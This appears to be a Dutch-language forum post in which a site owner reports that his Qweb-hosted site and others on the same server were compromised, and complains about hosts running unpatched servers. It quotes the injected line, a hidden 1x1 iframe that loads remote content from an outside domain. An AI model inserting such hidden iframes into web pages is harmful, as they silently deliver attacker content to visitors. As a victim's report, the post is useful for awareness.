Hallo mensen,
Gisteravond is mijn site door een hacker aangepast. De site draaide op
de mustang server van Qweb. De regel "<IFRAME
SRC="http://www.forced-action.com/" WIDTH=1 HEIGHT=1></IFRAME>" was
toegevoegd in verschillende index pagina's waaronder de homepagina. Er
wordt hierdoor een applet geladen, ik heb het niet verder onderzocht.
Later heb ik ontdekt dat vele (alle?) andere sites op deze server ook
aangepast zijn. Op het moment dat ik dit schrijf zijn er nog steeds
sites op die mustang server die deze regel hebben. Kijk bijvoorbeeld
eens de source van de homepagina van http://www.bashengeveld.nl.
Mijn site is nu verplaatst naar een andere server. Ik heb echter geen
enkel vertrouwen dat deze wel veilig is, omdat QWeb het blijkbaar
acceptabel vindt om een onveilige server in productie te houden.
Laatst heeft een collega van mij een Nessus scan gedaan op een server
van een andere goedkope Nederlandse hosting provider en deze bleek ook
zo lek als een mandje. Nessus gaf maar liefst 19 high severity
meldingen (19 high, 57 low en 12 informational). Dit kwam omdat men
software draaide zonder de nieuwste patches. Een hacker kan dan vrij
makkelijk binnenkomen en soms zelfs root rechten krijgen. En jij maar
denken dat je web winkeltje of je email correspondentie veilig was...
Om een onveilige server in productie te hebben vind ik een
onacceptabele manier van werken.
Louis.

Likes:

Quote